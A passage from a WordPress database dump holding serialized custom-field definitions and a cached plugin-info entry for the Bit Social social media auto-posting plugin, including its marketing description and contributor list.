en\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"_thumbnail_id\";a:23:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"_thumbnail_id\";s:5:\"label\";s:14:\"Featured Image\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"file\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:16:\"file_format_type\";s:6:\"single\";s:9:\"file_type\";s:10:\"images-any\";s:15:\"file_edit_title\";i:0;s:5:\"alias\";a:0:{}}s:12:\"resource_tag\";a:25:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"resource_tag\";s:5:\"label\";s:13:\"Resource Tags\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"taxonomy\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:12:\"resource_tag\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:12:\"resource_tag\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;}s:13:\"resource_type\";a:25:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"resource_type\";s:5:\"label\";s:14:\"Resource Types\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"taxonomy\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:13:\"resource_type\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:13:\"resource_type\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;}}','off'),(5330610,'_transient_jetpack_assumed_site_creation_date','2017-04-07 07:48:10','on'),(5301489,'_site_transient_wp_plugin_dependencies_plugin_data','a:1:{s:10:\"bit-social\";a:35:{s:4:\"name\";s:53:\"Bit Social – Social Media Auto Poster and Scheduler\";s:4:\"slug\";s:10:\"bit-social\";s:7:\"version\";s:7:\"1.13.10\";s:6:\"author\";s:68:\"<a href=\"https://profiles.wordpress.org/bitpressadmin/\">Bit Apps</a>\";s:14:\"author_profile\";s:45:\"https://profiles.wordpress.org/bitpressadmin/\";s:12:\"contributors\";a:8:{s:13:\"bitpressadmin\";a:3:{s:7:\"profile\";s:45:\"https://profiles.wordpress.org/bitpressadmin/\";s:6:\"avatar\";s:120:\"https://secure.gravatar.com/avatar/b6ace15c21db32bcc852d5ad587ab2e93cb412da29702fe90a2d6967fdba72bb?s=96&d=monsterid&r=g\";s:12:\"display_name\";s:8:\"Bit Apps\";}s:10:\"shimulckbt\";a:3:{s:7:\"profile\";s:42:\"https://profiles.wordpress.org/shimulckbt/\";s:6:\"avatar\";s:120:\"https://secure.gravatar.com/avatar/af174315b298406bc5432325df6a138d1e72897045de2a1191229d33e77bad8a?s=96&d=monsterid&r=g\";s:12:\"display_name\";s:18:\"Shimul Chakraborty\";}s:6:\"khoaiz\";a:3:{s:7:\"profile\";s:38:\"https://profiles.wordpress.org/khoaiz/\";s:6:\"avatar\";s:120:\"https://secure.gravatar.com/avatar/de8ca8a513dca32ee470895624be102cc3a9ed7abdd80141511f8a74fd3a3de3?s=96&d=monsterid&r=g\";s:12:\"display_name\";s:6:\"Khoaiz\";}s:12:\"shuvomohajan\";a:3:{s:7:\"profile\";s:44:\"https://profiles.wordpress.org/shuvomohajan/\";s:6:\"avatar\";s:120:\"https://secure.gravatar.com/avatar/88264616af4d55c13781f6b80ff8d8d6492d72dcdb48ff5db350d52470287182?s=96&d=monsterid&r=g\";s:12:\"display_name\";s:13:\"Shuvo Mohajan\";}s:9:\"tanvirchy\";a:3:{s:7:\"profile\";s:41:\"https://profiles.wordpress.org/tanvirchy/\";s:6:\"avatar\";s:120:\"https://secure.gravatar.com/avatar/5977f5f0b81e77aa2fc7cc706024e7a11e2c5763f0dab24a5f687158938a2a1f?s=96&d=monsterid&r=g\";s:12:\"display_name\";s:16:\"Tanvir Chowdhury\";}s:9:\"arif25897\";a:3:{s:7:\"profile\";s:41:\"https://profiles.wordpress.org/arif25897/\";s:6:\"avatar\";s:120:\"https://secure.gravatar.com/avatar/e3d247b43dee474edc2f1574b99b71a7fc7a01a8dd1d983530b26858e7617675?s=96&d=monsterid&r=g\";s:12:\"display_name\";s:4:\"Arif\";}s:10:\"mazharul78\";a:3:{s:7:\"profile\";s:42:\"https://profiles.wordpress.org/mazharul78/\";s:6:\"avatar\";s:120:\"https://secure.gravatar.com/avatar/e65fc557acf08ca7e990641e43a24e556da768ba5b6c3d1222d678375763477e?s=96&d=monsterid&r=g\";s:12:\"display_name\";s:17:\"Md Mazharul Islam\";}s:7:\"akaioum\";a:3:{s:7:\"profile\";s:39:\"https://profiles.wordpress.org/akaioum/\";s:6:\"avatar\";s:120:\"https://secure.gravatar.com/avatar/72e1d008b0b8b31a6029848c955edc4cf0aab65dc4b7c7908844ec305044d5f8?s=96&d=monsterid&r=g\";s:12:\"display_name\";s:12:\"Abdul kaioum\";}}s:8:\"requires\";s:3:\"5.1\";s:6:\"tested\";s:5:\"6.9.4\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}s:6:\"rating\";i:90;s:7:\"ratings\";a:5:{i:5;i:28;i:4;i:2;i:3;i:0;i:2;i:1;i:1;i:3;}s:11:\"num_ratings\";i:34;s:11:\"support_url\";s:48:\"https://wordpress.org/support/plugin/bit-social/\";s:15:\"support_threads\";i:1;s:24:\"support_threads_resolved\";i:1;s:15:\"active_installs\";i:6000;s:12:\"last_updated\";s:22:\"2026-05-07 10:24am GMT\";s:5:\"added\";s:10:\"2023-10-09\";s:8:\"homepage\";s:30:\"https://bitapps.pro/bit-social\";s:8:\"sections\";a:6:{s:11:\"description\";s:23671:\"<h4>Social Media Auto Posting and Scheduling Plugin for WordPress.</h4>\n<p>Bit Social is a <strong>social media automation plugin for WordPress</strong> that helps you automatically <strong>post to social media</strong>, schedule posts, generate captions, summaries, and images with AI, and manage your <strong>social media accounts</strong> directly from your WordPress dashboard.</p>\n<p>Bit Social connects your WordPress website with 13 major <strong>social media networks</strong>. Once your <strong>account</strong> is connected, the plugin can <strong>auto post, schedule posts</strong>, or <strong>share posts automatically</strong> when your content is published.</p>\n<p><span class=\"embed-youtube\" style=\"text-align:center; display: block;\"><iframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https://www.youtube.com/embed/FUU-EcK2jTw?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=en-US&#038;autohide=2&#038;wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\"></iframe></span></p>\n<p>With Bit Social, you can auto post to social media networks like <strong>Facebook, Twitter (X), Instagram, Pinterest, LinkedIn, Tumblr, Google Business Profile, Telegram, and more</strong> without switching platforms. This makes it easier to maintain a consistent online presence and automate content promotion.</p>\n<p>Bit Social is designed for bloggers, marketers, businesses, and WooCommerce store owners who want a simple social media automation solution. Whether you want to schedule posts, auto post, or re-share old posts, Bit Social helps you automate your social publishing workflow.</p>\n<p><span class=\"embed-youtube\" style=\"text-align:center; display: block;\"><iframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https://www.youtube.com/embed/UTl0kArQV4Q?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=en-US&#038;autohide=2&#038;wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\"></iframe></span></p>\n<p>Instead of copying content manually, Bit Social lets you share posts automatically, build a social media scheduling workflow, and maintain a consistent posting strategy.</p>\n<p>This <strong>social auto poster plugin</strong> is beginner friendly but powerful enough for professional marketers.</p>\n<h3>Key Capabilities of Bit Social</h3>\n<p>Bit Social provides a complete set of tools for automating and managing social media promotion. With Bit Social, you can:</p>\n<ul>\n<li>Automatically publish posts to 13 social platforms</li>\n<li>Build structured social media scheduling workflows</li>\n<li>Maintain consistent posting using a powerful scheduler</li>\n<li>Schedule posts for optimal engagement times</li>\n<li>Share posts automatically across connected platforms</li>\n<li>Promote WooCommerce products automatically</li>\n<li>Generate captions and images using AI tools</li>\n<li>Organize campaigns using a built-in social Calendar</li>\n<li>Re-share older content to keep your social feeds active</li>\n<li>Manage multiple social accounts from one WordPress dashboard</li>\n<li>Share any post type, including pages, media, or any CPT</li>\n<li>Track publishing activity with logs to monitor shared posts</li>\n<li>Add first comments automatically on Instagram, Threads, and Bluesky</li>\n</ul>\n<p>These capabilities make Bit Social a practical automation tool for content creators who want to increase visibility without spending hours managing social media manually.</p>\n<p><strong>Useful Links</strong><br />\n🚀<a href=\"https://towp.io/\" rel=\"nofollow ugc\">Try Full Version Demo</a> | 🚀<a href=\"https://bit-social.com/documentation\" rel=\"nofollow ugc\">Documentation</a> | 🚀<a href=\"https://www.youtube.com/playlist?list=PL7c6CDwwm-ALFAjnM5ZPuId8qcGqPBDvK\" rel=\"nofollow ugc\">Video Tutorials</a> | 🚀<a href=\"https://tawk.to/chat/60eac4b6d6e7610a49aab375/1faah0r3e\" rel=\"nofollow ugc\">Support</a> | 🚀<a href=\"https://www.facebook.com/groups/3308027439209387\" rel=\"nofollow ugc\">Facebook Group</a> | 🚀<a href=\"https://bit-social.com/\" rel=\"nofollow ugc\">Upgrade to Pro</a> |</p>\n<p>Join our <a href=\"https://www.facebook.com/groups/bitapps\" rel=\"nofollow ugc\">Bit Apps Community</a> for the latest plugin updates.</p>\n<p>View the full source code on <a href=\"https://github.com/Bit-Apps-Pro/bit-social-lite\" rel=\"nofollow ugc\">GitHub</a>.</p>\n<h3>Core Features</h3>\n<h4>WP Auto Post</h4>\n<p>When the <a href=\"https://bit-social.com/documentation/auto-publish-wordpress-posts-on-social-media\" rel=\"nofollow ugc\">WP Auto Post</a> feature is enabled, every time you publish a WordPress article the plugin can automatically distribute it to your connected accounts. Instead of manually copying links and writing messages for each platform, Bit Social automates the entire process.</p>\n<p><span class=\"embed-youtube\" style=\"text-align:center; display: block;\"><iframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https://www.youtube.com/embed/3ZsAF1AtmxU?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=en-US&#038;autohide=2&#038;wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\"></iframe></span></p>\n<h4>WP Post Schedule: WordPress Social Media Scheduler</h4>\n<p>Bit Social works like a flexible WordPress social media scheduler that allows you to plan your publishing strategy. Instead of posting manually every day, you can schedule posts and let the plugin publish them at the best time.<br />\n<strong>Scheduler Capabilities</strong></p>\n<ul>\n<li>Schedule posts for future publishing</li>\n<li>Plan long-term social media campaigns</li>\n<li>Maintain consistent posting across platforms</li>\n<li>Schedule WooCommerce products</li>\n<li>Build recurring publishing schedules</li>\n</ul>\n<p>The <a href=\"https://bit-social.com/documentation/schedule-wordpress-posts-on-social-media\" rel=\"nofollow ugc\">WP Post Scheduler</a> also supports custom publishing times, platform-specific schedules, and flexible automation rules. This makes it suitable for marketers who want predictable publishing schedules without manual posting.</p>\n<h4>Share Now: Instantly Share Post to Social Media</h4>\n<p>The <a href=\"https://bit-social.com/documentation/instantly-share-posts-on-social-media-platforms\" rel=\"nofollow ugc\">Share Now</a> feature allows you to instantly publish updates across your social accounts. Instead of creating a full blog post, you can write a quick message and publish it immediately.</p>\n<p>** Share Now is useful for: **</p>\n<ul>\n<li>Announcements</li>\n<li>Campaign updates</li>\n<li>Marketing promotions</li>\n<li>Product launches</li>\n<li>Quick alerts</li>\n</ul>\n<p>This feature helps businesses quickly communicate updates without needing to create full content pieces.</p>\n<p><span class=\"embed-youtube\" style=\"text-align:center; display: block;\"><iframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https://www.youtube.com/embed/qfF8OEu5RAI?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=en-US&#038;autohide=2&#038;wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\"></iframe></span></p>\n<h4>Social Media Calendar (Pro)</h4>\n<p>Bit Social includes a built-in <a href=\"https://bit-social.com/documentation/calendar\" rel=\"nofollow ugc\">Calendar</a> that helps you visualize your entire publishing plan.</p>\n<p><strong>With the Calendar, you can:</strong></p>\n<ul>\n<li>View all scheduled posts in one place</li>\n<li>Adjust publishing times easily</li>\n<li>Manage posts across multiple platforms</li>\n<li>Edit scheduled posts quickly</li>\n<li>Organize marketing campaigns</li>\n</ul>\n<p>The calendar view helps teams coordinate content and maintain a steady publishing rhythm. For businesses and marketers, this feature makes it easier to plan campaigns and ensure content is distributed consistently.</p>\n<h4>Auto Share Posts and Re-Share Old Posts</h4>\n<p>Bit Social can automatically share posts whenever they are published. You can also re-share older posts to keep valuable content visible and active.</p>\n<p><strong>Benefits include:</strong></p>\n<ul>\n<li>Automatic distribution of new posts</li>\n<li>Renewed visibility for evergreen content</li>\n<li>Increased traffic from social platforms</li>\n<li>Consistent posting activity</li>\n<li>Longer lifespan for blog content</li>\n</ul>\n<p>Re-sharing older posts is particularly helpful for blogs that publish evergreen content such as tutorials, guides, and resources.</p>\n<h4>Auto Post WooCommerce Product to Social Media (Pro)</h4>\n<p>Bit Social allows you to <strong>automatically share WooCommerce products on social media</strong>. When a product is published in your store, the plugin can post it to your connected social media platforms.</p>\n<p>This helps store owners promote <strong>new products, sales, and store updates</strong> without manually sharing every product. By automatically publishing WooCommerce product posts to social media, you can increase product visibility and drive more traffic to your store.</p>\n<h4>Smart Tags and Custom Templates</h4>\n<p>Bit Social lets you customize social media posts using <strong>Smart Tags and <a href=\"https://bit-social.com/documentation/templates\" rel=\"nofollow ugc\">templates</a></strong>. These tags automatically pull data from your WordPress posts or WooCommerce products and insert it into your social media messages.</p>\n<ul>\n<li><strong>Advanced Tags</strong>: Create <strong>hashtags from post tags, product tags, or categories</strong>, and map <strong>custom fields</strong> to include additional data from custom post types.</li>\n<li><strong>Post Tags</strong>: Insert WordPress post data such as <strong>post title, link, content, author, categories, tags, and featured image</strong>.</li>\n<li><strong>Product Tags</strong>: Insert WooCommerce product data like <strong>product name, description, price, stock, dimensions, product image, and product link</strong>.</li>\n</ul>\n<p>Templates allow you to control how posts appear on Facebook, Twitter (X), Instagram, Pinterest, LinkedIn, and Tumblr.</p>\n<h4>AI Prompts: AI-Powered Social Media Content (Pro)</h4>\n<p><a href=\"https://bit-social.com/documentation/auto-publish-wordpress-posts-on-social-media/ai-prompt-in-bit-social/\" rel=\"nofollow ugc\">AI Prompt</a> in Bit Social integrates AI tools to simplify content creation. Using the <strong>ChatGPT</strong> model, including <strong>DALL·E</strong>, the plugin can generate captions, summaries, hashtags, and images automatically.</p>\n<p><strong>AI Features</strong></p>\n<ul>\n<li>Caption generation using ChatGPT</li>\n<li>Automated summaries for posts</li>\n<li>Hashtag suggestions</li>\n<li>AI image generation using DALL·E</li>\n</ul>\n<p>You can create prompt templates that generate captions directly from your WordPress content. When a post is published or scheduled, Bit Social sends the prompt to ChatGPT and publishes the generated content across connected social media platforms.</p>\n<p>This helps maintain engaging social media posts without writing everything manually.</p>\n<h4>Multiple Account Support</h4>\n<p>Bit Social supports 13 social media platforms, making it useful for agencies and businesses managing multiple brands.</p>\n<p>With this feature, you can:</p>\n<ul>\n<li>Manage multiple brands</li>\n<li>Publish across different platforms</li>\n<li>Share posts across multiple accounts</li>\n</ul>\n<p>Accounts can also be grouped to simplify publishing workflows.</p>\n<h4>Scheduling and Automation Controls</h4>\n<p>Bit Social includes advanced scheduling controls that allow you to fine-tune how posts are distributed. Automation settings include:</p>\n<ul>\n<li>Advanced scheduling rules</li>\n<li>Platform delays</li>\n<li>Posting intervals</li>\n<li>Automation workflows</li>\n</ul>\n<p>These features help create natural posting patterns and give you full control over your social media strategy.</p>\n<h4>First Comment Automation (Pro)</h4>\n<p>Bit Social lets you <strong>automatically add a first comment</strong> after a post is published. You can use it to include <strong>hashtags, links, or extra text</strong> without adding them to the main caption.</p>\n<p>This feature works on <strong>Instagram, Threads, and Bluesky</strong>.</p>\n<h4>External Cron Support (Pro)</h4>\n<p>Bit Social includes <strong><a href=\"https://bit-social.com/documentation/setting/setup-cron-jobs/#external-cron\" rel=\"nofollow ugc\">External Cron</a> support</strong> to improve the reliability of scheduled posts and social media automation. With External Cron enabled, scheduled tasks run independently of website traffic, ensuring your posts are published on time across connected social media platforms.</p>\n<p>This feature helps maintain a consistent posting schedule and ensures your social media automation continues to run smoothly.</p>\n<h3>Supported Social Media Platforms</h3>\n<p>Bit Social supports <strong>13 popular social media platforms</strong> and is available in both Free and Pro versions. The free version provides the essential features needed to start automating social media sharing, while the Pro version unlocks advanced scheduling, additional platforms, and AI-powered automation.</p>\n<h4>Bit Social Free</h4>\n<p>The free version supports two platforms:</p>\n<ul>\n<li><a href=\"https://bit-social.com/docs/accounts/connect-your-facebook-account-with-bit-social/\" rel=\"nofollow ugc\">Facebook</a> | <a href=\"https://www.youtube.com/watch?v=V7-DqQ4dJg4&amp;list=PL7c6CDwwm-ALFAjnM5ZPuId8qcGqPBDvK&amp;index=11\" rel=\"nofollow ugc\">Watch Video</a></li>\n<li><a href=\"https://bit-social.com/docs/accounts/schedule-auto-publish-wordpress-posts-to-linkedin\" rel=\"nofollow ugc\">LinkedIn (Profile)</a> | <a href=\"https://www.youtube.com/watch?v=e7sTXvswQgE&amp;list=PL7c6CDwwm-ALFAjnM5ZPuId8qcGqPBDvK&amp;index=4\" rel=\"nofollow ugc\">Watch Video</a></li>\n</ul>\n<p>This allows users to begin automating social sharing without requiring complex configuration.</p>\n<h4>Bit Social Pro</h4>\n<p>The Pro version unlocks full platform support, including:</p>\n<ul>\n<li><a href=\"https://bit-social.com/documentation/accounts/connect-your-linkedin-account-with-bit-social/\" rel=\"nofollow ugc\">Linkedin (Page)</a></li>\n<li><a href=\"https://bit-social.com/documentation/accounts/connect-your-instagram-account-with-bit-social/\" rel=\"nofollow ugc\">Instagram</a></li>\n<li><a href=\"https://bit-social.com/docs/accounts/connect-your-google-business-profile-with-bit-social/\" rel=\"nofollow ugc\">Google Business Profile</a></li>\n<li><a href=\"https://bit-social.com/docs/bit-social/accounts/schedule-auto-publish-wordpress-posts-to-twitter/\" rel=\"nofollow ugc\">Twitter (X)</a></li>\n<li><a href=\"https://bit-social.com/docs/bit-social/accounts/schedule-auto-publish-wordpress-posts-to-tumblr/\" rel=\"nofollow ugc\">Tumblr</a> </li>\n<li><a href=\"https://bit-social.com/documentation/accounts/connect-your-pinterest-account-with-bit-social/\" rel=\"nofollow ugc\">Pinterest</a></li>\n<li><a href=\"https://bit-social.com/documentation/accounts/connect-your-tiktok-account-with-bit-social/\" rel=\"nofollow ugc\">TikTok</a></li>\n<li><a href=\"https://bit-social.com/documentation/accounts/connect-your-bluesky-account-with-bit-social/\" rel=\"nofollow ugc\">Bluesky</a></li>\n<li><a href=\"https://bit-social.com/docs/accounts/connect-your-discord-account-with-bit-social/\" rel=\"nofollow ugc\">Discord</a></li>\n<li><a href=\"https://bit-social.com/documentation/accounts/connect-your-line-account-with-bit-social/\" rel=\"nofollow ugc\">Line</a></li>\n<li><a href=\"https://bit-social.com/documentation/accounts/connect-your-telegram-account-with-bit-social/\" rel=\"nofollow ugc\">Telegram</a></li>\n<li><a href=\"https://bit-social.com/documentation/accounts/connect-your-threads-account-with-bit-social/\" rel=\"nofollow 